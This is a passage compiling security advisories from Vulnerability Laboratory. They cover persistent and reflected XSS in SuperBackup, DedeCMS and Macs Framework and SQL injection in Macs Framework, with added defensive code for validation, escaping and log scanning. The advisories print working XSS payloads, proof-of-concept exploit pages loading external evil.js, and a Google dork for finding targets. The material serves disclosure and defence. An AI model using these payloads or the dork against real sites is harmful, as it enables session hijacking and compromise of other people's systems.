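            if _TAG.search(decoded) or _HANDLER_OR_SCHEME.search(decoded):
                hits.append((name, decoded))
    return hits


if __name__ == "__main__":
    for label, req in (("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST),
                       ("double-encoded", DOUBLE_ENCODED_REQUEST)):
        print(label, "->", find_markup(req))
```

A check like this belongs in a WAF rule or a request log review, not in place of output encoding: the response headers above (`X-XSS-Protection`, `X-Frame-Options`) do not stop a comment that the server itself renders back unencoded, which is the advisory's actual finding.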



Proof of Concept (PoC):
=======================

// Let's suppose we're attacking an admin with higher privileges

1- Attacker opens his account

2- Adds an arbitrary comment

3- Intercepts the request

4- Adds the malicious script to the comment

5- The admin accesses his account and wants to add a comment; the
malicious script gets executed

===> Admin account compromised



===============================================================================



Example malicious script :


<script>
  alert(document.cookie);
</script>



===============================================================================
            
# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://dropouts.in/
# Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097
# CVE: N/A

Document Title:
===============
SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2202


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2202


Common Vulnerability Scoring System:
====================================
4.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Backup all your iPhone or iPad contacts in 1 tap and export them.
Fastest way to restore contacts from PC or Mac.
Export by mailing the backed up contacts file to yourself. Export
contacts file to any other app on your device.
Export all contacts directly to your PC / Mac over Wifi, no software
needed! Restore any contacts directly from
PC / Mac. Restore contacts via mail. Get the ultimate contacts backup
app now.

(Copy of the Homepage:
https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site web vulnerabilities in the official SuperBackup
v2.0.5 ios mobile application.


Affected Product(s):
====================
Dropouts Technologies LLP
Product: Super Backup v2.0.5


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered
in the official SuperBackup v2.0.5 ios mobile application.
The vulnerability allows remote attackers to inject their own malicious
script code with a persistent attack vector to compromise the mobile
web-application from the application-side.

The cross site scripting web vulnerabilities are located in the
`newPath`, `oldPath` & `filename` parameters of the vcf listing module.
Remote attackers are able to inject their own malicious persistent script
code as a vcf filename into the main index list. The request method to
inject is POST and the attack vector of the vulnerability is located on
the application-side. The injection point is the vcf filename or import.
The execution point occurs in the main index list after the import or
insert.

Remote attackers are able to inject their own script code into the
client-side requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious sources and
persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] VCF

Vulnerable Parameter(s):
[+] newPath (path - vcf filename)
[+] oldPath (path - vcf filename)


Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote
attackers without a privileged user account and with low user interaction.
For a security demonstration or to reproduce the cross site scripting
vulnerability, follow the provided information and steps below.


PoC: Payload (Filename)
>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe>


PoC: Vulnerable Source (Listing - Index)
<button type="button" class="btn btn-default btn-xs button-download">
<span class="glyphicon glyphicon-download-alt"></span>
</button>
</td>
<td class="column-name"><p class="edit" title="Click to
rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td>
<td class="column-size">
<p>26.40 KB</p>
</td>
<td class="column-delete">
<button type="button" class="btn btn-danger btn-xs button-delete">
<span class="glyphicon glyphicon-trash"></span>
</button>
</td>
</tr></tbody></table>
</div>


PoC: Exception-Handling
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>
09:17:12:PM 10:Apr.:2020 .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source
onload=alert("PWND")></iframe> .vcf"
-
Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
.vcf"
to "/Contacts >"<iframe src=evil.source
onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf"


PoC: Exploit
BEGIN:VCARD
VERSION:3.0
PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;;
END:VCARD


--- PoC Session Logs [POST] ---
http://localhost/move
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 187
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/
oldPath=/Contacts 09:17:12:PM 10:Apr.:2020
.vcf&newPath=/evil-filename>"<iframe src=evil.source
onload=alert("PWND")></iframe>.vc
-
POST: HTTP/1.1 500 Internal Server Error
Content-Length: 593
Content-Type: text/html; charset=utf-8
Connection: Close
Server: GCDWebUploader
-
http://localhost/evil.source
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/
-
GET: HTTP/1.1 200 OK
Server: GCDWebUploader
Connection: Close


Solution - Fix & Patch:
=======================
1. Parse and filter the vcf name values on add, edit and import to
prevent script execution.
2. Restrict and filter the vcf names in the index listing to sanitize
the output.
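As an added illustration of the two fix steps above (this is example code written for this page, not AirDisk Pro's or GCDWebUploader's own code, and Python is used only for illustration), the following validates a rename/move target before it is accepted and HTML-escapes the stored name when the listing row from the vulnerable source above is rendered. The `/move` form fields `oldPath`/`newPath` are taken from the session log; the function names, the forbidden-character policy and the 255-character limit are assumptions.

```python
import html
import re

# Payload quoted in the advisory (filename / vCard name vector).
ADVISORY_PAYLOAD = '>"<iframe src=evil.source onload=alert("PWND")></iframe>'

# Assumed policy for a user-supplied name on this interface: no HTML or
# quote metacharacters, no path separators, no control characters.
_FORBIDDEN = re.compile(r'[<>"\'&/\\\x00-\x1f\x7f]')


def validate_filename(name, max_len=255):
    """Return the trimmed name if it passes the policy, else raise ValueError.

    Rejecting (rather than silently stripping) keeps the rename explicit and
    avoids quietly producing a different name than the user asked for.
    """
    name = name.strip()
    if not name or name in (".", ".."):
        raise ValueError("empty or reserved file name")
    if len(name) > max_len:
        raise ValueError("file name too long")
    if _FORBIDDEN.search(name):
        raise ValueError("file name contains forbidden characters")
    return name


def check_move_request(form):
    """Validate the /move form (oldPath, newPath) before touching the file system.

    Every path component of newPath is checked, so a payload that happens to
    contain a '/' (as '</iframe>' does) cannot slip a bad component past a
    basename-only check. Returns a small dict standing in for an HTTP result.
    """
    old_path = form.get("oldPath", "")
    new_path = form.get("newPath", "")
    if not old_path.startswith("/") or not new_path.startswith("/"):
        return {"status": 400, "error": "paths must be absolute within the share"}
    parts = new_path.strip("/").split("/")
    try:
        for part in parts:
            validate_filename(part)
    except ValueError as exc:
        return {"status": 400, "error": str(exc)}
    return {"status": 200, "newName": parts[-1]}


def render_name_cell(name):
    """Build the listing cell from the advisory's markup with the name escaped.

    html.escape(quote=True) turns < > & " ' into entities, so the name renders
    as text whatever was stored on disk; this is the second fix step.
    """
    safe = html.escape(name, quote=True)
    return ('<td class="column-name"><p class="edit" title="Click to rename...">'
            + safe + '</p></td>')


if __name__ == "__main__":
    print(check_move_request({"oldPath": "/Contacts.vcf",
                              "newPath": "/evil-filename" + ADVISORY_PAYLOAD + ".vcf"}))
    print(render_name_cell(ADVISORY_PAYLOAD))
```

Both layers are needed: validation stops new names like the one in the exception-handling log from being written, and escaping on output protects against names that reached the disk some other way (a vCard import, or a file copied in over USB).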


Security Risk:
==============
The security risk of the persistent vcf cross site scripting web
vulnerability is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
            
# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor Link: http://www.dedecms.com
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A

Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2195


Release Date:
=============
2020-04-09


Vulnerability Laboratory ID (VL-ID):
====================================
2195


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Welcome to use the most professional PHP website content management
system in China, the Zhimeng content management system; it will be your
first choice for easy website building. Adopt XML namespace style core
templates: all templates are saved in file form, which provides great
convenience for users to design templates and website upgrade transfers.
The robust template tags provide strong support for webmasters to DIY
their own websites. High-efficiency tag caching mechanism: allows the
caching of similar tags. When generating HTML, it helps to improve the
reaction speed of the system and reduce the resources consumed by the
system.

(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site scripting vulnerabilities in the official
DedeCMS v5.7 SP2 (UTF8) web-application.


Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System  v5.7 SP2


Vulnerability Disclosure Timeline:
==================================
2020-04-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerabilities have been
discovered in the official DedeCMS v5.7 SP2 UTF8 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent script code inject web vulnerabilities are located in the
`activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor`
and `CKEditorFuncNum` parameters of the `file_pic_view.php`,
`file_manage_view.php`, `tags_main.php`, `select_media.php` and
`media_main.php` files.
The attack vector of the vulnerability is non-persistent and the request
method to inject is POST. Successful exploitation of the vulnerability
results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation
of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable File(s):
[+] file_pic_view.php
[+] file_manage_view.php
[+] tags_main.php
[+] select_media.php
[+] media_main.php

Vulnerable Parameter(s):
[+] tag
[+] keyword
[+] activepath
[+] fmdo=move&filename & fmdo=edit&filename
[+] CKEditor & CKEditor=body&CKEditorFuncNum


Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers with a
privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability, follow the
provided information and steps below to continue.


Request: Examples
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads
https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en


PoC: Payload
".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].*
onload=alert(document.domain)>
>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png
onload=alert(document.domain)">
>"><iframe src=evil.source onload=alert(document.domain)>
%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E
%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E
%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E


PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe
src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway=">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe
src=evil.source
onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe
src=evil.source onload=alert(document.domain)>2&langCode=en">
...

--- PoC Session Logs [POST] --- (Some Examples ...)
https://test23.localhost:8080/dede/media_main.php
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: https://test23.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/media_main.php
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php
keyword=>"%20<<img
src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1830
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon,
06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/dede/file_pic_view.php
?activepath=%2Fuploads%2F>"
<"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer:
https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.6.40
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/include/dialog/select_media.php?
CKEditor=>"><iframe src=evil.source
onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source
onload=alert("2")>2&langCode=en
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1;
DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1137
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2


Reference(s):
https://test23.localhost:8080/dede/media_main.php
https://test23.localhost:8080/dede/tags_main.php
https://test23.localhost:8080/dede/file_pic_view.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/include/dialog/select_media.php


Solution - Fix & Patch:
=======================
1. Parse the content to disallow html / js and special chars on the
affected input fields
2. Restrict the vulnerable parameters to prevent injects via POST method
requests
3. Secure the output location where the content is insecurely sanitized
and delivered as output
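Alongside the fix, a defender wants to know whether the parameters listed in this advisory have already been hit. The following is an added example (not DedeCMS code; Python is used for illustration) that scans web-server access-log lines for the files and parameters named above and flags values that decode to HTML markup. The log lines are constructed for this example in combined log format and modelled on the PoC URLs; the watched-parameter table, the markup character class and the second decoding pass are assumptions. POST bodies (the `keyword` inject to `media_main.php`) do not appear in an access log and need application or WAF logging instead.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Files and parameters named in the advisory (the orderby/orderway pair
# appears in the PoC URLs for tags_main.php). Assumed watch-list.
WATCHED = {
    "/dede/file_pic_view.php": {"activepath"},
    "/dede/file_manage_view.php": {"filename", "activepath"},
    "/dede/tags_main.php": {"tag", "orderby", "orderway"},
    "/dede/media_main.php": {"keyword"},
    "/include/dialog/select_media.php": {"CKEditor", "CKEditorFuncNum"},
}

# Any of these in a decoded value is enough to break out of the contexts
# shown in the advisory (attribute values and element text).
MARKUP = re.compile(r'[<>"]')

# Combined log format request line; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample: lines 2, 3 and 5 carry the advisory's payloads.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Apr/2020:17:53:23 +0000] "GET /dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads HTTP/2.0" 200 1830
203.0.113.7 - - [06/Apr/2020:17:54:01 +0000] "GET /dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads HTTP/2.0" 200 1830
203.0.113.7 - - [06/Apr/2020:17:55:12 +0000] "GET /dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway= HTTP/2.0" 200 1702
203.0.113.7 - - [06/Apr/2020:17:56:40 +0000] "GET /include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en HTTP/2.0" 200 1137
198.51.100.2 - - [06/Apr/2020:17:57:05 +0000] "GET /dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E HTTP/2.0" 200 2210
"""


def scan_request_target(target):
    """Return [(param, decoded_value)] for watched parameters that carry markup."""
    parts = urlsplit(target)
    watched = WATCHED.get(parts.path)
    if not watched:
        return []
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for value in values:
            # parse_qs decoded one layer; a second unquote catches %253C-style
            # double encoding (a rare false positive on a literal '%3C' is accepted).
            decoded = unquote(value)
            if MARKUP.search(decoded):
                hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Run scan_request_target over access-log lines; one finding per hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, value in scan_request_target(m.group("target")):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": urlsplit(m.group("target")).path,
                             "param": param, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["path"], f["param"], repr(f["value"]))
```

Matching on the decoded value rather than on raw `%3C` strings is what makes the check robust against the mixed encodings seen in the PoC URLs (`%3E%22%3E` next to a literal `>"`), and restricting it to the advisory's parameter names keeps the noise from legitimate HTML-bearing fields elsewhere in the CMS down.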


Security Risk:
==============
The security risk of the application-side persistent cross site
scripting web vulnerabilities in the different modules is estimated as
medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
# CVE: N/A

Document Title:
===============
Macs Framework v1.14f CMS - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2206


Release Date:
=============
2020-04-14


Vulnerability Laboratory ID (VL-ID):
====================================
2206


Common Vulnerability Scoring System:
====================================
7.4


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management
System. It focuses mainly on the
Edit In Place editing concept. It comes with a built in blog with
moderation support, user manager section,
roles manager section, SEO / SEF URL.
https://sourceforge.net/projects/macs-framework/files/latest/download

(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Macs Framework v1.1.4f CMS.


Affected Product(s):
====================
Macrob7
Product: Macs Framework v1.14f - Content Management System


Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1 & 1.2
Multiple non-persistent cross site scripting web vulnerabilities have
been discovered in the official Macs Framework v1.1.4f Content Management
System. The vulnerability allows remote attackers to manipulate
client-side browser to web-application requests to compromise user
session credentials or to manipulate module content.

The first vulnerability is located in the search input field of the
search module. Remote attackers are able to inject own malicious script
code as search entry to execute the code within the results page that is
loaded shortly after the request is performed. The request method to
inject is POST and the attack vector is located on the client-side with
non-persistent attack vector.

The second vulnerability is located in the email input field of the
account reset function. Remote attackers are able to inject own
malicious script code as email to reset the password to execute the code
within the performed request. The request method to inject is POST and
the attack vector is located on the client-side with non-persistent
attack vector.

Successful exploitation of the vulnerabilities results in session
hijacking, non-persistent phishing attacks, non-persistent external
redirects to malicious source and non-persistent manipulation of
affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] searchString
[+] emailAddress


1.3
Multiple remote sql-injection web vulnerabilities have been discovered in
the official Macs Framework v1.1.4f Content Management System.
The vulnerability allows remote attackers to inject or execute own sql
commands to compromise the dbms or file system of the application.

The sql injection vulnerabilities are located in the `roleId` and
`userId` parameters of the `editRole` and `deleteUser` modules. The
request method to inject or execute commands is GET and the attack
vector is located on the application-side. Attackers with privileged
accounts to edit are able to inject own sql queries via `roleId` and
`userId` on deleteUser or editRole. Multiple unhandled and broken sql
queries are visible as default debug output to users as well.

Exploitation of the remote sql injection vulnerability requires no user
interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database
management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] deleteUser
[+] editRole

Vulnerable Parameter(s):
[+] userId
[+] roleId


Proof of Concept (PoC):
=======================
Google Dork(s): intitle, subtitle & co.
Site Powered by Mac's PHP MVC Framework Framework of the future
Design downloaded from Zeroweb.org: Free website templates, layouts, and
tools.


1.1
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without a user account and with low user
interaction. For security demonstration or to reproduce the cross site
scripting web vulnerability, follow the provided information and steps
below to continue.


PoC: Payload
>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0


PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/search" id="searchForm">
<span class="searchLabel">Search Site:</span><input type="searchString"
value="" name="searchString" class="searchString">
<input type="submit" value="Search" class="searchSubmit">
</form><br>
<span class="error">No Results found for: "<iframe src="evil.source"
onload="alert(document.cookie)"></span>


--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/search
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://macs-cms.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
Upgrade-Insecure-Requests: 1
searchString=>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 9865


1.2
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without a user account and with low user
interaction. For security demonstration or to reproduce the cross site
scripting web vulnerability, follow the provided information and steps
below to continue.


PoC: Exploitation
test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com


PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/login"
class="ajax" ajaxoutput="#loginMessage">
  <table style="width:100%">
    <tbody><tr>
      <td style="width: 20px">Username:</td>
      <td><input type="text" name="username"></td>
    </tr>
    <tr>
      <td>Password:</td>
      <td><input type="password" name="password"></td>
    </tr>
    <tr>
